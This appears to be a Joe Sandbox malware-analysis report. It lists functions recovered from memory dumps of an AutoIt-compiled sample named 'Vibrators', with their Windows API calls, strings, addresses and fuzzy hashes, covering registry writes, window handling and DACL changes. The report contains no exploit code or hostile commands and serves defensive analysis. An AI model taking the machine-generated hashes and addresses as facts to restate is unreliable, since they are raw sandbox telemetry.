Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 8f724535a4c6978996384f7f252f848380ad8d969de84a81eb9386776ceb3ca3
Instruction ID: d2ed65caa7c3201c4064ed25fc4269eabfdbf65dc60e8cd1f28737ffc5ba6311
Opcode Fuzzy Hash: 8f724535a4c6978996384f7f252f848380ad8d969de84a81eb9386776ceb3ca3
Instruction Fuzzy Hash: 83B17CB1604305AFD714EF64C984B6BBBE9FF84310F00891CF9999B2A1D771E846CB92

Function 00A80CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A80D81
_wcslen.LIBCMT ref: 00A80DBB
_wcslen.LIBCMT ref: 00A80E25
_wcslen.LIBCMT ref: 00A80E8D
_wcslen.LIBCMT ref: 00A80F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00A80F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A80FA0

Part of subcall function 00A0FD52: _wcslen.LIBCMT ref: 00A0FD5D

Part of subcall function 00A52B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A52BA5
Part of subcall function 00A52B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A52BD7

Strings

GETTEXT, xrefs: 00A80E88, 00A80EA3
ISSELECTED, xrefs: 00A80F79
SELECT, xrefs: 00A80FE4
GETSELECTEDCOUNT, xrefs: 00A80F0C, 00A80F27
SELECTCLEAR, xrefs: 00A80FC9
SELECTINVERT, xrefs: 00A8101A
DESELECT, xrefs: 00A81038
VIEWCHANGE, xrefs: 00A81111
GETITEMCOUNT, xrefs: 00A80DB2, 00A80DD3
FINDITEM, xrefs: 00A810C3
GETSUBITEMCOUNT, xrefs: 00A80E20, 00A80E3B
GETSELECTED, xrefs: 00A8107D
SELECTALL, xrefs: 00A80FB1

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: ebbb2b3f6107931de7eee24833d5215521155725cc202d7a22cca7443658e0d2
Instruction ID: 07c6a0e6120fac57ead09f6f2537e7feb6a9b8c476f8c5231a25707fe89bf616
Opcode Fuzzy Hash: ebbb2b3f6107931de7eee24833d5215521155725cc202d7a22cca7443658e0d2
Instruction Fuzzy Hash: 38E1E2312043458FC754EF28C95097AB7EAFF85314B14896CF8969B3A2DB30ED49CB91

Function 009F2521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009F25F8
GetSystemMetrics.USER32(00000007), ref: 009F2600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009F262B
GetSystemMetrics.USER32(00000008), ref: 009F2633
GetSystemMetrics.USER32(00000004), ref: 009F2658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 009F2675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 009F2685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 009F26B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 009F26CC
GetClientRect.USER32(00000000,000000FF), ref: 009F26EA
GetStockObject.GDI32(00000011), ref: 009F2706
SendMessageW.USER32(00000000,00000030,00000000), ref: 009F2711

Part of subcall function 009F19CD: GetCursorPos.USER32(?), ref: 009F19E1
Part of subcall function 009F19CD: ScreenToClient.USER32(00000000,?), ref: 009F19FE
Part of subcall function 009F19CD: GetAsyncKeyState.USER32(00000001), ref: 009F1A23
Part of subcall function 009F19CD: GetAsyncKeyState.USER32(00000002), ref: 009F1A3D

SetTimer.USER32(00000000,00000000,00000028,009F199C), ref: 009F2738

Strings

AutoIt v3 GUI, xrefs: 009F26B0

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: f186d8506bc8db39c9fd0b550712de64e8809914aa66b5c23fd7d09eeaf4a36c
Instruction ID: 5954ae232fcb06956bbb2471c2388626a499cee87d8fcc90c8f159e2a6b4d4db
Opcode Fuzzy Hash: f186d8506bc8db39c9fd0b550712de64e8809914aa66b5c23fd7d09eeaf4a36c
Instruction Fuzzy Hash: ACB14771A00209EFDF14DFA8CC95BAE7BB5FB48314F114229FA15AB2E0DB74A941CB51

Function 00A516D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A51A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A51A60
Part of subcall function 00A51A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A514E7,?,?,?), ref: 00A51A6C
Part of subcall function 00A51A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A514E7,?,?,?), ref: 00A51A7B
Part of subcall function 00A51A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A514E7,?,?,?), ref: 00A51A82
Part of subcall function 00A51A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A51A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A51741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A51775
GetLengthSid.ADVAPI32(?), ref: 00A5178C
GetAce.ADVAPI32(?,00000000,?), ref: 00A517C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A517E2
GetLengthSid.ADVAPI32(?), ref: 00A517F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A51801
HeapAlloc.KERNEL32(00000000), ref: 00A51808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A51829
CopySid.ADVAPI32(00000000), ref: 00A51830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A5185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A51881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A51893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A518BA
HeapFree.KERNEL32(00000000), ref: 00A518C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A518CA
HeapFree.KERNEL32(00000000), ref: 00A518D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A518DA
HeapFree.KERNEL32(00000000), ref: 00A518E1
GetProcessHeap.KERNEL32(00000000,?), ref: 00A518ED
HeapFree.KERNEL32(00000000), ref: 00A518F4

Part of subcall function 00A51ADF: GetProcessHeap.KERNEL32(00000008,00A514FD,?,00000000,?,00A514FD,?), ref: 00A51AED
Part of subcall function 00A51ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A514FD,?), ref: 00A51AF4
Part of subcall function 00A51ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A514FD,?), ref: 00A51B03

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 0b5d471dba163691f4cbc1de848629422e9517eb58babfdf12c6778c114989b1
Instruction ID: 7cc717d43346b95008f2aa7afe5deed0ca2eb9e4954b2fc0857cb97dad445d36
Opcode Fuzzy Hash: 0b5d471dba163691f4cbc1de848629422e9517eb58babfdf12c6778c114989b1
Instruction Fuzzy Hash: 077139B2D00209ABDF20DFE5DC48FAEBBB9BF44751F144225E915A6190D7719A0ACBA0

Function 00A7CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A7CF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,00A8DCD0,00000000,?,00000000,?,?), ref: 00A7CFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00A7D004
_wcslen.LIBCMT ref: 00A7D054
_wcslen.LIBCMT ref: 00A7D0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00A7D112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00A7D221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00A7D2AD
RegCloseKey.ADVAPI32(?), ref: 00A7D2E1
RegCloseKey.ADVAPI32(00000000), ref: 00A7D2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00A7D3C0

Strings

REG_DWORD, xrefs: 00A7D264
REG_BINARY, xrefs: 00A7D373
REG_MULTI_SZ, xrefs: 00A7D155
REG_QWORD, xrefs: 00A7D323
REG_SZ, xrefs: 00A7D0A4
REG_EXPAND_SZ, xrefs: 00A7D02D

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 234473bdde740a9493c8f759e83f356e3245398cc1518a1e3ada443cfed985d2
Instruction ID: 180cc7041007b4d096102d367c21aa1128a87711d64c07ad5894455498dbc727
Opcode Fuzzy Hash: 234473bdde740a9493c8f759e83f356e3245398cc1518a1e3ada443cfed985d2
Instruction Fuzzy Hash: C81238356042059FDB14EF14C885B6AB7F5AF88724F14C85CF99A9B3A2CB31ED42CB81

Function 00A813BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A81462
_wcslen.LIBCMT ref: 00A8149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A814F0
_wcslen.LIBCMT ref: 00A81526
_wcslen.LIBCMT ref: 00A815A2
_wcslen.LIBCMT ref: 00A8161D

Part of subcall function 00A0FD52: _wcslen.LIBCMT ref: 00A0FD5D

Part of subcall function 00A53535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A53547

Strings

GETTEXT, xrefs: 00A81733
CHECK, xrefs: 00A81521, 00A8153C
SELECT, xrefs: 00A817AD
EXPAND, xrefs: 00A81694
GETTOTALCOUNT, xrefs: 00A8148E, 00A814B3
GETITEMCOUNT, xrefs: 00A816BA
EXISTS, xrefs: 00A81618, 00A81633
UNCHECK, xrefs: 00A817DA
ISCHECKED, xrefs: 00A8177D
GETSELECTED, xrefs: 00A816EA
COLLAPSE, xrefs: 00A8159D, 00A815B8

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 3f0dd2a215bcaba143b0c0a501fa3f2bc0a0d72af1af801aa4cd9c0731d5fe1a
Instruction ID: 751d934fc841298fe5d64c73d8cc4e348c53a5c77d4c82ea8333d004b0191094
Opcode Fuzzy Hash: 3f0dd2a215bcaba143b0c0a501fa3f2bc0a0d72af1af801aa4cd9c0731d5fe1a
Instruction Fuzzy Hash: DBE17D726043018FCB14EF28C55196AB7EAFFD4314B14895DF8969B7A2DB30ED46CB81

Function 00A7D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A7C10E,?,?), ref: 00A7D415
_wcslen.LIBCMT ref: 00A7D451
_wcslen.LIBCMT ref: 00A7D4C8
_wcslen.LIBCMT ref: 00A7D4FE
_wcslen.LIBCMT ref: 00A7D559
_wcslen.LIBCMT ref: 00A7D58F
_wcslen.LIBCMT ref: 00A7D5DF

Strings

HKCU, xrefs: 00A7D62E
HKCC, xrefs: 00A7D60C
HKEY_CLASSES_ROOT, xrefs: 00A7D553, 00A7D558
HKEY_LOCAL_MACHINE, xrefs: 00A7D4C2, 00A7D4C7
HKEY_CURRENT_CONFIG, xrefs: 00A7D5D9, 00A7D5DE
HKLM, xrefs: 00A7D4F8, 00A7D4FD
HKEY_USERS, xrefs: 00A7D63F
HKU, xrefs: 00A7D650
HKEY_CURRENT_USER, xrefs: 00A7D61D
HKCR, xrefs: 00A7D589, 00A7D58E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 159a2059f5575e953e24fae16921f65bdffdf6d21833d2fb983d6eded71aa203
Instruction ID: ed23a31ceffcb316db993127685e4dbf1caa4c8c3a2fcac7583a220efd7881b1
Opcode Fuzzy Hash: 159a2059f5575e953e24fae16921f65bdffdf6d21833d2fb983d6eded71aa203
Instruction Fuzzy Hash: 4D71077261051A8BCB109F7CCE505FB33B6AF60768F25C124F85EAB295EA35DD85C3A0

Function 00A88D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A88DB5
_wcslen.LIBCMT ref: 00A88DC9
_wcslen.LIBCMT ref: 00A88DEC
_wcslen.LIBCMT ref: 00A88E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A88E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00A86691), ref: 00A88EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A88EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00A88F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A88F5C
FreeLibrary.KERNEL32(?), ref: 00A88F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A88F78
DestroyIcon.USER32(?,?,?,?,?,00A86691), ref: 00A88F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A88FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A88FB0

Strings

.icl, xrefs: 00A88DC3
.dll, xrefs: 00A88E06
.exe, xrefs: 00A88DE3

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: bbbf29dbaa11e49ad5427afaf6b381be1b4423ef82d8bce8197386dffa434bd3
Instruction ID: 07300bff8f963535b30c13ea1f8c010c3f7c6c1b63eef05d0a85e1960c94b3d2
Opcode Fuzzy Hash: bbbf29dbaa11e49ad5427afaf6b381be1b4423ef82d8bce8197386dffa434bd3
Instruction Fuzzy Hash: B161DF71900619BAEB14EF64DC45BBE77A8BF08B20F508506F915D61D1DF78ED90CBA0

Function 00A648BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00A6493D
_wcslen.LIBCMT ref: 00A64948
_wcslen.LIBCMT ref: 00A6499F
_wcslen.LIBCMT ref: 00A649DD
GetDriveTypeW.KERNEL32(?), ref: 00A64A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A64A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A64A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A64ACC

Strings

wait, xrefs: 00A64A89
set cd door , xrefs: 00A64A6D
type cdaudio alias cd wait, xrefs: 00A64A46
closed, xrefs: 00A6494D, 00A64972, 00A6498B, 00A649C3, 00A649DC
close, xrefs: 00A64943, 00A6495D
open, xrefs: 00A64999, 00A6499E
close cd wait, xrefs: 00A64AB7
open , xrefs: 00A64A2A

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 91f9d48f4f72b8577d48a6a3a3c0476821f416d3c7c255945da2dd9a9c48a02f
Instruction ID: b0e5ea2dc795cb88c3bf93ce44a8f4eea22c496adbfde1957746d2a50fd84757
Opcode Fuzzy Hash: 91f9d48f4f72b8577d48a6a3a3c0476821f416d3c7c255945da2dd9a9c48a02f
Instruction Fuzzy Hash: AF719D725086059FC710EF24C84097BBBF8EFA9768F10492DF895972A2EB31DD45CB91

Function 00A56382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00A56395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A563A7
SetWindowTextW.USER32(?,?), ref: 00A563BE
GetDlgItem.USER32(?,000003EA), ref: 00A563D3
SetWindowTextW.USER32(00000000,?), ref: 00A563D9
GetDlgItem.USER32(?,000003E9), ref: 00A563E9
SetWindowTextW.USER32(00000000,?), ref: 00A563EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00A56410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00A5642A
GetWindowRect.USER32(?,?), ref: 00A56433
_wcslen.LIBCMT ref: 00A5649A
SetWindowTextW.USER32(?,?), ref: 00A564D6
GetDesktopWindow.USER32 ref: 00A564DC
GetWindowRect.USER32(00000000), ref: 00A564E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00A5653A
GetClientRect.USER32(?,?), ref: 00A56547
PostMessageW.USER32(?,00000005,00000000,?), ref: 00A5656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00A56596

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 8b70135104fb3fd2f8af50765844d9d09fd51b9be9c5bc2a111c705e0b9f95c8
Instruction ID: f68d938d1297c98fbe5081feea5d13117ada7f445410cd23e2df5cc6fba500a0
Opcode Fuzzy Hash: 8b70135104fb3fd2f8af50765844d9d09fd51b9be9c5bc2a111c705e0b9f95c8
Instruction Fuzzy Hash: 59719E31900709AFDB20DFA8CE45BAEBBF5FF48705F500928E986A35A0D775E949CB50

Function 00A7086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00A70884
LoadCursorW.USER32(00000000,00007F8A), ref: 00A7088F
LoadCursorW.USER32(00000000,00007F00), ref: 00A7089A
LoadCursorW.USER32(00000000,00007F03), ref: 00A708A5
LoadCursorW.USER32(00000000,00007F8B), ref: 00A708B0
LoadCursorW.USER32(00000000,00007F01), ref: 00A708BB
LoadCursorW.USER32(00000000,00007F81), ref: 00A708C6
LoadCursorW.USER32(00000000,00007F88), ref: 00A708D1
LoadCursorW.USER32(00000000,00007F80), ref: 00A708DC
LoadCursorW.USER32(00000000,00007F86), ref: 00A708E7
LoadCursorW.USER32(00000000,00007F83), ref: 00A708F2
LoadCursorW.USER32(00000000,00007F85), ref: 00A708FD
LoadCursorW.USER32(00000000,00007F82), ref: 00A70908
LoadCursorW.USER32(00000000,00007F84), ref: 00A70913
LoadCursorW.USER32(00000000,00007F04), ref: 00A7091E
LoadCursorW.USER32(00000000,00007F02), ref: 00A70929
GetCursorInfo.USER32(?), ref: 00A70939
GetLastError.KERNEL32 ref: 00A7097B

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: b594ec6b53080e5bcbb138bf1f42021b7a68a8e73541f4c7a7af7b7078517816
Instruction ID: c6c4e5fe9ea8ffed458e2f92d09df21fd49c2401d5ab6e8334c02674d482d01b
Opcode Fuzzy Hash: b594ec6b53080e5bcbb138bf1f42021b7a68a8e73541f4c7a7af7b7078517816
Instruction Fuzzy Hash: 3D4144B0D08319AADB10DFBA8C85C6EBFE8FF44754B50852AE15CE7291DA789901CF91

Function 00A10436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00A10436

Part of subcall function 00A1045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00AC170C,00000FA0,ABC80613,?,?,?,?,00A32733,000000FF), ref: 00A1048C
Part of subcall function 00A1045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00A32733,000000FF), ref: 00A10497
Part of subcall function 00A1045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00A32733,000000FF), ref: 00A104A8
Part of subcall function 00A1045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00A104BE
Part of subcall function 00A1045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A104CC
Part of subcall function 00A1045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A104DA
Part of subcall function 00A1045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A10505
